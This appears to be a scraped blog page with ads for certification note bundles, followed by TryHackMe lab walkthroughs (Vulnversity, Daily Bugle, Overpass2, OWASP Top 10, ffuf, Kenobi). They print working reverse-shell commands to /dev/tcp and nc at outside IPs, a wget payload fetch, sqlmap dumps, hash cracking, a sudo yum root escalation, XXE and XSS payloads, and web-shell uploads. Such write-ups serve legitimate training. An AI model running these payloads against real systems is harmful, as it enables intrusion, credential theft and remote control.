OSCP is not about knowing what tool exists.
It's about recalling the right command instantly, under pressure, without panic.
No scrolling. No guessing. No broken cheatsheets.
These are not PDFs. They’re an Obsidian vault you can search, link, and build upon.
One-time payment. No subscriptions.
OSCP tests execution under pressure.
These notes let you focus on strategy, not syntax.
OSWP is not about memorizing Wi-Fi theory.
It's about executing attacks cleanly, calmly, and correctly under pressure.
No guessing. No debugging hell. No failed handshakes.
Most resources dump commands and hope you figure it out.
These notes teach you why attacks fail and how to fix them.
One-time payment. No subscriptions. No fluff.
Wireless attacks fail when you panic and guess.
They succeed when you follow a calm, tested process.
These notes give you confidence, clarity, and execution — exactly what OSWP demands.
]]>
Most bug hunters don't fail because they lack skill.
They fail because they miss things. This checklist ensures that does not happen.
Built from real reports, real triage feedback, and real mistakes that cost money.
This is not a list of vulnerability names.
Each item tells you what to test, why it matters, and what success looks like.
One-time payment. No subscriptions. No fluff.
Bug bounty success is rarely about one genius idea.
It’s about not missing obvious and non-obvious issues.
This checklist makes your testing deliberate, repeatable, and profitable — one program at a time.
]]>
CRTA is not about memorizing AD tools.
It's about thinking like an attacker inside Active Directory — from initial foothold to domain dominance.
No theory. No guesswork. Just attack flows that work in real enterprises.
Most AD resources work in perfect lab conditions.
These notes teach you what actually works when defenders are watching.
One-time payment. No subscriptions. No fluff.
Active Directory feels random when you’re guessing attack paths.
It becomes predictable when you follow a structured playbook.
These notes give you the clarity, structure, and real-world relevance to dominate any AD environment — from CRTA to real red team engagements.
]]>Room Link: https://thm.com/room/theimpossiblechallenge
Room Link: https://thm.com/room/tutorial
openvpn to connect.A flag is just a piece of text that's used to verify you've performed a certain action. In security challenges, users are asked to find flags to prove that they've successfully hacked a machine Answer flag{connection_verified}Room Link: https://thm.com/room/vulnversity
sudo openvpn --config username.ovpn.nmap -sV 10.10.65.81
Output of the command:Starting Nmap 7.80 ( https://nmap.org ) at 2024-02-26 09:55 IST
Nmap scan report for 10.10.135.130
Host is up (0.20s latency).
Not shown: 994 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
3128/tcp open http-proxy Squid http proxy 3.5.12
3333/tcp open http Apache httpd 2.4.18 ((Ubuntu))
Service Info: Host: VULNUNIVERSITY; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 36.77 seconds
how many ports are open? Answer 6What version of the squid proxy is running on the machine? Answer 3.5.12How many ports will Nmap scan if the flag -p-400 was used? Answer 400What is the most likely operating system this machine is running? Answer UbuntuWhat port is the web server running on? Answer 3333What is the flag for enabling verbose mode using Nmap? Answer -vgobuster dir -u http://10.10.65.81:3333 -w /usr/share/wordlist/SecLists/Discovery/Web-Content/directory-list-2.3-big.txt
Output of the command:===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.65.81:3333
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /opt/wordlist/SecLists/Discovery/Web-Content/directory-list-2.3-big.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/images (Status: 301) [Size: 318] [--> http://10.10.65.81:3333/images/]
/css (Status: 301) [Size: 315] [--> http://10.10.65.81:3333/css/]
/js (Status: 301) [Size: 314] [--> http://10.10.65.81:3333/js/]
/fonts (Status: 301) [Size: 317] [--> http://10.10.65.81:3333/fonts/]
/internal (Status: 301) [Size: 320] [--> http://10.10.65.81:3333/internal/]
Progress: 9932 / 1273834 (0.78%)
What is the directory that has an upload form page? Answer /internal/What common file type you'd want to upload to exploit the server is blocked? Try a couple to find out. Answer .phpRun this attack, what extension is allowed? Answer .phtml.phtml. Use nc -lvnp 1234 to get shell.What is the name of the user who manages the webserver? Answer bill. Use ls /home command to get username.What is the user flag? Answer ******************************** (32 alphanumeric characters). Command used cat /home/bill/user.txtfind / -perm /4000 2> /dev/null.On the system, search for all SUID files. Which file stands out? Answer /bin/systemctl Because systemctl don’t have suid permission normally.[Unit]
Description=ZishanAdThandar
[Service]
Type=simple
User=root
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/10.17.102.105/1337 0>&1'
[Install]
WantedBy=multi-user.target
python3 -m http.server 7860/tmp directory using cd /tmp command. Then uploaded the file with wget http://10.17.102.105:7860/ZishanAdThandar.service command./bin/systemctl enable /tmp/ZishanAdThandar.service command on reverse shell.nc -lvnp 1337./bin/systemctl start ZishanAdThandar to start the service and immediately we will get reverse shell as root on another netcat listner.Become root and get the last flag (/root/root.txt) Answer ******************************** (32 alphanumeric characters). Command used cat /root/root.txtRoom Link: https://thm.com/room/dailybugle
Access the web server, who robbed the bank? Answer spidermannmap -A 10.10.250.153
Starting Nmap 7.94 ( https://nmap.org ) at 2024-03-05 11:33 IST
Nmap scan report for 10.10.250.153
Host is up (0.18s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
| 2048 68:ed:7b:19:7f:ed:14:e6:18:98:6d:c5:88:30:aa:e9 (RSA)
| 256 5c:d6:82:da:b2:19:e3:37:99:fb:96:82:08:70:ee:9d (ECDSA)
|_ 256 d2:a9:75:cf:2f:1e:f5:44:4f:0b:13:c2:0f:d7:37:cc (ED25519)
80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/5.6.40)
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.6.40
|_http-title: Home
|_http-generator: Joomla! - Open Source Content Management
| http-robots.txt: 15 disallowed entries
| /joomla/administrator/ /administrator/ /bin/ /cache/
| /cli/ /components/ /includes/ /installation/ /language/
|_/layouts/ /libraries/ /logs/ /modules/ /plugins/ /tmp/
3306/tcp open mysql MariaDB (unauthorized)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 38.97 seconds
What is the Joomla version? Answer 3.7.0
Got this details using OWASP joomscan by Mohammad Reza Espargham , Ali Razmjoo.
Command used: joomscan -u http://10.10.250.153/searchsploit joomla 3.7.0
---------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------- ---------------------------------
Joomla! 3.7.0 - 'com_fields' SQL Injection | php/webapps/42033.txt
Joomla! Component Easydiscuss < 4.0.21 - Cros | php/webapps/43488.txt
---------------------------------------------- ---------------------------------
Shellcodes: No Results
sqlmap -u "http://10.10.250.153/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -p list[fullordering] --threads=10 --dbms=MySQL --technique=Esqlmap -u "http://10.10.250.153/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -p list[fullordering] --threads=10 --dbms=MySQL --technique=E --dbs and got a database named joomlajoomla command sqlmap -u "http://10.10.250.153/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -p list[fullordering] --threads=10 --dbms=MySQL --technique=E -D joomla --tables and we will get a table named #__userssqlmap -u "http://10.10.250.153/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -p list[fullordering] --threads=10 --dbms=MySQL --technique=E -D joomla -T "#__users" --columns it will prompt for bruteforcing existing column names, we can find some column names like id, username, email, password etc.sqlmap -u "http://10.10.250.153/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -p list[fullordering] --threads=10 --dbms=MySQL --technique=E -D joomla -T "#__users" -C id,name,username,email,password --dump
It shows result like that,+-----+------------+----------+---------------------+--------------------------------------------------------------+
| id | name | username | email | password |
+-----+------------+----------+---------------------+--------------------------------------------------------------+
| 811 | Super User | jonah | jonah@thm.com | $2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw.V.d3p12kBtZutm |
+-----+------------+----------+---------------------+--------------------------------------------------------------+
hashid to detect hash type and it could be bcrypt.hashid '$2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw.V.d3p12kBtZutm'
Analyzing '$2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw.V.d3p12kBtZutm'
[+] Blowfish(OpenBSD)
[+] Woltlab Burning Board 4.x
[+] bcrypt
john the ripper to decrypt the hash, using rockyou.txt wordlist.john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt --format=bcrypt
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
*********** (?)
1g 0:00:09:27 DONE (2020-06-14 17:12) 0.001762g/s 82.55p/s 82.55c/s 82.55C/s sweetsmile..speciala
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
What is Jonah's cracked password? Answer spiderman123jonah and password spiderman123 on http://10.10.250.153/administrator/.Extensions > Templates > Templates and select Beez3 and edit the index.php file to get reverse shell.netcat with nc -lvnp 1234 and replaced the code in index.php with pentestmonkey shell with own ip port and save.nc -nlvp 1234
Listening on 0.0.0.0 1234
Connection received on 10.10.250.153 56764
Linux dailybugle 3.10.0-1062.el7.x86_64 #1 SMP Wed Aug 7 18:08:02 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
04:23:12 up 5:27, 0 users, load average: 0.00, 0.01, 0.05
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=48(apache) gid=48(apache) groups=48(apache)
jjameson with command ls /home.************* inside /var/www/html/configuration.php using cat /var/www/html/configuration.php.jjameson and got the flag
```bash ssh jjameson@10.10.250.153The authenticity of host ‘10.10.250.153 (10.10.250.153)’ can’t be established. ED25519 key fingerprint is SHA256:Gvd5jH4bP7HwPyB+lGcqZ+NhGxa7MKX4wXeWBvcBbBY. This key is not known by any other names Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added ‘10.10.250.153’ (ED25519) to the list of known hosts. jjameson@10.10.250.153’s password: Last login: Tue Mar 5 04:27:31 2024 [jjameson@dailybugle ~]$ cat /home/jjameson/user.txt **********
- Question `What is the user flag?` Answer `**************************`
- Using `sudo -l` command shows `/usr/bin/yum`.
```bash
sudo -l
Matching Defaults entries for jjameson on dailybugle:
!visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin,
env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS",
env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE",
env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES",
env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE",
env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin
User jjameson may run the following commands on dailybugle:
(ALL) NOPASSWD: /usr/bin/yum
b will upgrade ssh to rootTF=$(mktemp -d)
cat >$TF/x<<EOF
[main]
plugins=1
pluginpath=$TF
pluginconfpath=$TF
EOF
cat >$TF/y.conf<<EOF
[main]
enabled=1
EOF
cat >$TF/y.py<<EOF
import os
import yum
from yum.plugins import PluginYumExit, TYPE_CORE, TYPE_INTERACTIVE
requires_api_version='2.1'
def init_hook(conduit):
os.execl('/bin/sh','/bin/sh')
EOF
sudo yum -c $TF/x --enableplugin=y
cat /root/root.txt will give us root flag.sh-4.2# id
uid=0(root) gid=0(root) groups=0(root)
sh-4.2# cat /root/root.txt
******************************
What is the root flag? Answer **************************Room: https://thm.com/room/overpass2hacked
overpass2.pcapng.md5sum of the file to verify file.md5sum overpass2.pcapng
11c3b2e9221865580295bc662c35c6dc overpass2.pcapng
wireshark and follow TCP streams of suspicious streams. But, I used strings overpass2.pcapng./development/upload.php.What was the URL of the page they used to upload a reverse shell? Answer /development/.<?php exec("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.170.145 4242 >/tmp/f")?>. You can check it by scrolling or simply use strings overpass2.pcapng |grep "php exec"What payload did the attacker use to gain access? Answer exec("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.170.145 4242 >/tmp/f").What password did the attacker use to privesc? Answer whene************tant. You can manually scan strings result to see the password.How did the attacker establish persistence? Answer https://github.com/NinjaJc01/ssh-backdoor. With same manual scrolling will work here.cat /etc/shadow command and it’s result inside strings output. We can simply save it in a file named shadow.fasttrack wordlist as instructed using command wget https://raw.githubusercontent.com/drtychai/wordlists/master/fasttrack.txt.john --wordlist=fasttrack.txt shadow
Loaded 5 password hashes with 5 different salts (crypt, generic crypt(3) [?/64])
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
se*****y3 (paradox)
ab***23 (szymex)
s****t12 (bee)
1***2wsx (muirland)
4g 0:00:00:04 100% 0.8113g/s 45.03p/s 187.4c/s 187.4C/s 2003..starwars
Use the "--show" option to display all of the cracked passwords reliably
Session completed
Using the fasttrack wordlist, how many of the system passwords were crackable? Answer 4https://github.com/NinjaJc01/ssh-backdoor. We can find hash and salt details inside code. https://raw.githubusercontent.com/NinjaJc01/ssh-backdoor/master/main.goWhat's the default hash for the backdoor?
Answer bdd04d9bb7621687f5df9001f******2d7d8391dfc885d0e9b68acd01fc2170e3What's the hardcoded salt for the backdoor?
Answer 1c362db832f3f864c8c2fe05f2002a05.What was the hash that the attacker used? - go back to the PCAP for this!
Answer 6d05358f090eea56a238af******19292cbfe0b5e98ad1fec71bed. We can check it manually inside strings output. By using strings overpass2.pcapng |grep "backdoor -a" we can directly find the output.sha512. So we can decode it using hashcat.hashcat -m 1710 "6d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed:1c362db832f3f864c8c2fe05f2002a05" --force /opt/wordlist/rockyou.txt --quiet
6d05358f090eea56a238af02e47d44ee5489d234810ef6240280857ec69712a3e5e370b8a41899d0196ade16c0d54327c5654019292cbfe0b5e98ad1fec71bed:1c362db832f3f864c8c2fe05f2002a05:no******6
Crack the hash using rockyou and a cracking tool of your choice. What's the password? Answer n********6The attacker defaced the website. What message did they leave as a heading? Answer H4ck3d by CooctusClan. Manually checking strings output for downloading deface page will show this. We can also use this command strings overpass2.pcapng |grep "H4ck3d". Or simply opening the ip in browser will show this heading.strings output. We already have username james and can use cracked password. We need to use -oHostKeyAlgorithms=+ssh-rsa to get ssh as there is an error.ssh -p 2222 james@10.10.136.126
Unable to negotiate with 10.10.136.126 port 2222: no matching host key type found. Their offer: ssh-rsa
$ ssh -oHostKeyAlgorithms=+ssh-rsa james@10.10.136.126 -p 2222
The authenticity of host '[10.10.136.126]:2222 ([10.10.136.126]:2222)' can't be established.
RSA key fingerprint is SHA256:z0OyQNW5sa3rr6mR7yDMo1avzRRPcapaYwOxjttuZ58.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[10.10.136.126]:2222' (RSA) to the list of known hosts.
james@10.10.136.126's password: *******
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.
What's the user flag? Answer thm{****************}james@overpass-production:/home/james/ssh-backdoor$ cat /home/james/user.txt
thm{****************}
find . -perm /4000 we got a unusual file /home/james/.suid_bash. We can get suid exploit for it here https://gtfobins.github.io/gtfobins/bash/#suidWhat's the root flag? Answer thm{***************************}james@overpass-production:/home/james/ssh-backdoor$ /home/james/.suid_bash -p
.suid_bash-4.4# id
uid=1000(james) gid=1000(james) euid=0(root) egid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd),1000(james)
.suid_bash-4.4# cat /root/root.txt
thm{***************************}
Room Link: https://thm.com/r/room/owasptop10
$$$$$$\ $$\ $$\ $$$$$$\ $$$$$$\ $$$$$$$\
$$ __$$\ $$ | $\ $$ |$$ __$$\ $$ __$$\ $$ __$$\
$$ / $$ |$$ |$$$\ $$ |$$ / $$ |$$ / \__|$$ | $$ |
$$ | $$ |$$ $$ $$\$$ |$$$$$$$$ |\$$$$$$\ $$$$$$$ |
$$ | $$ |$$$$ _$$$$ |$$ __$$ | \____$$\ $$ ____/
$$ | $$ |$$$ / \$$$ |$$ | $$ |$$\ $$ |$$ |
$$$$$$ |$$ / \$$ |$$ | $$ |\$$$$$$ |$$ |
\______/ \__/ \__|\__| \__| \______/ \__|
$$$$$$$$\ $$$$$$\ $$$$$$$\ $$\ $$$$$$\
\__$$ __|$$ __$$\ $$ __$$\ $$$$ | $$$ __$$\
$$ | $$ / $$ |$$ | $$ |\_$$ | $$$$\ $$ |
$$ | $$ | $$ |$$$$$$$ | $$ | $$\$$\$$ |
$$ | $$ | $$ |$$ ____/ $$ | $$ \$$$$ |
$$ | $$ | $$ |$$ | $$ | $$ |\$$$ |
$$ | $$$$$$ |$$ | $$$$$$\\$$$$$$ /
\__| \______/ \__| \______|\______/
Badges: https://thm.com/ZishanAdThandar/badges/owasp-10
http://machine_ip/evilshell.php.What strange text file is in the website root directory? Answer drpepper.txt. Running ls command will show this strange text file.How many non-root/non-service/non-daemon users are there? Answer 0. Running cat /etc/passwd will show.What user is this app running as? Answer www-data. Used command whoami.What is the user's shell set as? Answer /usr/sbin/nologin. Command used getent passwd www-data or cat /etc/passwd |grep www-data.What version of Ubuntu is running? Answer ``. Command used lsb_release -a.Print out the MOTD. What favorite beverage is shown? Answer DR PEPPER. Used command cat /etc/update-motd.d/00-header.
http://MACHINE_IP:8888.What is the flag that you found in darren's account? Answer fe860794************74b667. To get flag inside darren’s account, register as “ darren” and login. Here you need to use whitespace before darren’s name.arthur and click on Complete.What is the flag that you found in arthur's account? Answer d9ac0f7************75e16e.
http://machine_ip/assets/images/lake-taupo.jpg.http://machine_ip/assets directory, there is a sensitive databse file named webapp.db.What is the name of the mentioned directory? Answer /assets.Navigate to the directory you found in question one. What file stands out as being likely to contain sensitive data? Answer webapp.db. It’s a file inside /assets.file webapp.db command shows it’s a sqlite3 file. Now, we can read the db file with sqlite3 webapp.db..table command to get table names, we will see there is two table named session and users. We can get column names using PRAGMA table_info(users); command.
$> sqlite3 webapp.db
SQLite version 3.37.2 2022-01-06 13:25:41
Enter ".help" for usage hints.
sqlite> .tables
sessions users
sqlite> PRAGMA table_info(users);
0|userID|TEXT|1||1
1|username|TEXT|1||0
2|password|TEXT|1||0
3|admin|INT|1||0
sqlite>
select * from users; will show user’s details inside the table. We can get admin hash there 6eea9b7ef191*******0f6c05ceb.
sqlite> select * from users;
4413096d9c933359b898b6202288a650|admin|6eea9b7ef191******f6c05ceb|1
23023b67a32488588db1e28579ced7ec|Bob|ad0234829205b9033196ba818f7a872b|1
4e8423b514eef575394ff78caed3254d|Alice|268b38ca7b84f44fa0a6cdc86e6301e0|0
sqlite>
Use the supporting material to access the sensitive data. What is the password hash of the admin user? Answer 6eea9b7ef191*****dd0f6c05ceb.What is the admin's plaintext password? Answer qwe****op. We can crack the hash using CrackStation.Login as the admin. What is the flag? Answer THM{Yzc2Yjd*************diMjdl}. If we goto http://machine_ip/login and login with username admin and the cracked password qw*****iop, it will redirect to http://machine_ip/console/. There we can get the flag.
Full form of XML Answer eXtensible Markup LanguageIs it compulsory to have XML prolog in XML documents? Answer NoCan we validate XML documents against a schema? Answer YesHow can we specify XML version and encoding in XML document? Answer xml prolog
How do you define a new ELEMENT? Answer !ELEMENTHow do you define a ROOT element? Answer !DOCTYPEHow do you define a new ENTITY? Answer !ENTITY
falcon feast and clicked on Complete./etc/passwd and clicked on complete.What is the name of the user in /etc/passwd Answer falcon. We read it from output of last payload./etc/passwd to ssh file location /home/falcon/.ssh/id_rsa.Where is falcon's SSH key located? Answer /home/falcon/.ssh/id_rsa. <?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY read SYSTEM '/home/falcon/.ssh/id_rsa'>]>
<root>&read;</root>
What are the first 18 characters for falcon's private key Answer MIIEogI****CAQEA7b
http://machine_ip/ and login with username note and password test123, then click on Complete.Look at other users notes. What is the flag? Answer flag{fivef***three}. Got it by changing note id to 0 and visiting link http://machine_ip/note.php?note=0.
machine_ip, we can get a webapp name Pensive Notes. After googling I got default username password in a github repo https://github.com/NinjaJc01/PensiveNotes. Default credential of Pensive Notes is pensive:PensiveNotes.Hack into the webapp, and find the flag! Answer thm{4b95139*******a1f9d672e17}
Navigate to http://machine_ip in your browser and click on the "Reflected XSS" tab on the navbar; craft a reflected XSS payload that will cause a popup saying "Hello". Answer ThereIsMoreToXSSThanYouThink. Used payload <script>alert("Hello")</script>, PoC link http://machine_ip/reflected?keyword=%3Cscript%3Ealert(%22Hello%22)%3C/script%3EOn the same reflective page, craft a reflected XSS payload that will cause a popup with your machines IP address. Answer ReflectiveXss4TheWin. Used payload <script>alert(window.location.hostname)</script>, PoC link http://machine_ip/reflected?keyword=%3Cscript%3Ealert(window.location.hostname)%3C/script%3Ehttp://machine_ip/stored and create an account.Then add a comment and see if you can insert some of your own HTML. Answer HTML_T4gs. Commented <img> in http://machine_ip/stored.On the same page, create an alert popup box appear on the page with your document cookies. Answer W3LL_D0N3_LVL2 Payload used <script>alert(document.cookie)</script>to. Payload used <script>document.querySelector("#thm-title").textContent="I am a hacker"</script>.Change "XSS Playground" to "I am a hacker" by adding a comment and using Javascript. Answer websites_can_be_easily_defaced_with_xss
Who developed the Tomcat application? Answer The Apache Software FoundationWhat type of attack that crashes services can be performed with insecure deserialization? Answer Denial of Service
if a dog was sleeping, would this be: A) A State B) A Behaviour Answer A Behaviour
What is the name of the base-2 formatting that data is sent across a network as? Answer binary
If a cookie had the path of webapp.com/login , what would the URL that the user has to visit be? Answer webapp.com/login/What is the acronym for the web technology that Secure cookies work over? Answer https
http://machine_ip/register, create a account and login.CTRL+SHIFT+I and goto Storage section to read and edit cookies.sessionId cookie and decode it with base64 decoder. Command to decode base64, echo "gAN9cQAoWAkAAABzZXNzaW9uSWRxAVggAAAAN2Y1MWRiYWFhZjY2NDYwMzkyNTNiNTlkOTY3NTAwYWVxAlgLAAAAZW5jb2RlZGZsYWdxA1gYAAAAVEhNe2dvb2Rfb2xkX2Jhc2U2NF9odWh9cQR1Lg==" |base64 -d. You will get the first flag.1st flag (cookie value) Answer THM{good******se64_huh}userType cookie value to admin from user and reload the page and it will redirect to the admin page and show the flag.2nd flag (admin dashboard) Answer THM{heres******in_flag}
nc -lvp 4444 command.userType value to user from admin. Open http://machine_ip/myprofile, then click on Exchange on vim and after that feedback. Give feedback.ifconfig tun0 |grep destination |cut -d" " -f10 command. Then run the python script with python3 pickleme.py. Copy the cookie and add a cookie with that value, name it encodedPayload. Reload feedback page. You will get a netcat shell. You can read flag using cat ../flag.txt command.flag.txt Answer 4a69a7***fd68
http://machine_ip, we get link to http://machine_ip/admin.php and projectworlds.in link. After searching bookstore on projectworlds.in, we get this page https://projectworlds.in/free-projects/php-projects/online-book-store-project-in-php/ with default credential username: admin@admin.com password: admin.<?php system('wc -c /etc/passwd'); ?> in shell.php. After going to edit book, upload shell.php with change button./bootstrap/img directory. Just open the directory in the link, you can get your uploaded shell there, http://machine_ip/bootstrap/img/shell.php. If you open the page, it will compile and execute the code to display character number of /etc/passwd.How many characters are in /etc/passwd (use wc -c /etc/passwd to get the answer) Answer 1611
What IP address is the attacker using? Answer 49.99.13.16. We can check lot of unauthorized login from this ip.What kind of attack is being carried out? Answer Bruteforce. As we can see many unatuthorized usernames requested.
Room Link: https://thm.com/r/room/ffuf
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
HackiFy to install those tools. Repo: https://github.com/ZishanAdThandar/HackiFy
AttackBox.Start the Machine.ffuf -u http://MACHINE_IP/NORAJ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/big.txt:NORAJ, just replaced seclists location with /opt/wordlist/SecLists/ as HackiFy install it inside /opt/wordlist directory.What is the first file you found with a 200 status code? Answer favicon.ico
ffuf -u http://MACHINE_IP/FUZZ -w /opt/wordlist/SecLists/Discovery/Web-Content/raft-medium-files-lowercase.txt we can get some output.What text file did you find? Answer robots.txtffuf -u http://MACHINE_IP/indexFUZZ -w /opt/wordlist/SecLists/Discovery/Web-Content/web-extensions.txt , we can get output.What two file extensions were found for the index page? Answer php,phpsffuf -u http://MACHINE_IP/FUZZ -w /opt/wordlist/SecLists/Discovery/Web-Content/raft-medium-words-lowercase.txt -e .php,.txt and observe the output.What page has a size of 4840? Answer about.phpffuf -u http://MACHINE_IP/FUZZ -w /opt/wordlist/SecLists/Discovery/Web-Content/raft-medium-directories-lowercase.txt. We will get some directories.How many directories are there? Answer 4
After applying the fc filter, how many results were returned? Answer 11. Got by observing output of command ffuf -u http://MACHINE_IP/FUZZ -w /opt/wordlist/SecLists/Discovery/Web-Content/raft-medium-files-lowercase.txt -fc 403.After applying the mc filter, how many results were returned? Answer 6 . Got by observing output of command ffuf -u http://MACHINE_IP/FUZZ -w /opt/wordlist/SecLists/Discovery/Web-Content/raft-medium-files-lowercase.txt -mc 200Which valuable file would have been hidden if you used -fc 403 instead of -fr? Answer wp-forum.phps. Got by observing output difference between -fc 403 command and command ffuf -u http://MACHINE_IP/FUZZ -w /opt/wordlist/SecLists/Discovery/Web-Content/raft-medium-files-lowercase.txt -fr '/\..*'
Start Machine. Also read this section.What is the parameter you found? Answer id. Got it from output of ffuf -u 'http://MACHINE_IP/sqli-labs/Less-1/?FUZZ=1' -c -w /opt/wordlist/SecLists/Discovery/Web-Content/burp-parameter-names.txt -fw 39.What is the highest valid id? Answer 14. Got it by running, for i in {0..255}; do echo $i; done | ffuf -u 'http://MACHINE_IP/sqli-labs/Less-1/?id=FUZZ' -c -w - -fw 33.What is Dummy's password? Answer p@ssword. Got it with command ffuf -u http://MACHINE_IP/sqli-labs/Less-11/ -c -w /opt/wordlist/SecLists/Passwords/Leaked-Databases/hak5.txt -X POST -d 'uname=Dummy&passwd=FUZZ&submit=Submit' -fs 1435 -H 'Content-Type: application/x-www-form-urlencoded' .
Complete.
Complete.
ffuf -h.How do you save the output to a markdown file (ffuf.md)? Answer -of md -o ffuf.mdHow do you re-use a raw http request file? Answer -requestHow do you strip comments from a wordlist? Answer -icHow would you read a wordlist from STDIN? Answer -w -How do you print full URLs and redirect locations? Answer -vWhat option would you use to follow redirects? Answer -rHow do you enable colorized output? Answer -c
Complete and done.Author: Zishan Ahamed Thandar
]]>Room Link: https://thm.com/room/kenobi
nmap 10.10.60.186
Starting Nmap 7.80 ( https://nmap.org ) at 2024-02-28 14:09 IST
Nmap scan report for 10.10.60.186
Host is up (0.16s latency).
Not shown: 992 closed ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
139/tcp open netbios-ssn
445/tcp open microsoft-ds
2049/tcp open nfs
2500/tcp filtered rtsserv
Nmap done: 1 IP address (1 host up) scanned in 20.38 seconds
nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse 10.10.104.199
Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-28 17:37 IST
Nmap scan report for 10.10.104.199
Host is up (0.16s latency).
PORT STATE SERVICE
445/tcp open microsoft-ds
Host script results:
|_smb-enum-users: ERROR: Script execution failed (use -d to debug)
| smb-enum-shares:
| account_used: guest
| \\10.10.104.199\IPC$:
| Type: STYPE_IPC_HIDDEN
| Comment: IPC Service (kenobi server (Samba, Ubuntu))
| Users: 1
| Max Users: <unlimited>
| Path: C:\tmp
| Anonymous access: READ/WRITE
| Current user access: READ/WRITE
| \\10.10.104.199\anonymous:
| Type: STYPE_DISKTREE
| Comment:
| Users: 0
| Max Users: <unlimited>
| Path: C:\home\kenobi\share
| Anonymous access: READ/WRITE
| Current user access: READ/WRITE
| \\10.10.104.199\print$:
| Type: STYPE_DISKTREE
| Comment: Printer Drivers
| Users: 0
| Max Users: <unlimited>
| Path: C:\var\lib\samba\printers
| Anonymous access: <none>
|_ Current user access: <none>
Nmap done: 1 IP address (1 host up) scanned in 28.24 seconds
Using the nmap command above, how many shares have been found? Answer 3anonymous user using given command smbclient //10.10.56.134/anonymous to read filessmbclient //10.10.56.134/anonymous
Password for [WORKGROUP\root]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Wed Sep 4 16:19:09 2019
.. D 0 Wed Sep 4 16:26:07 2019
log.txt N 12237 Wed Sep 4 16:19:09 2019
9204224 blocks of size 1024. 6877096 blocks available
Once you're connected, list the files on the share. What is the file can you see? Answer log.txtsmbget -R smb://10.10.56.134/anonymous
Password for [root] connecting to //10.10.56.134/anonymous:
Using workgroup WORKGROUP, user root
smb://10.10.56.134/anonymous/log.txt
Downloaded 11.95kB in 6 seconds
What port is FTP running on? Answer 21 Got it from log.txtnmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount 10.10.56.134
Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-28 23:36 IST
Nmap scan report for 10.10.56.134
Host is up (0.16s latency).
PORT STATE SERVICE
111/tcp open rpcbind
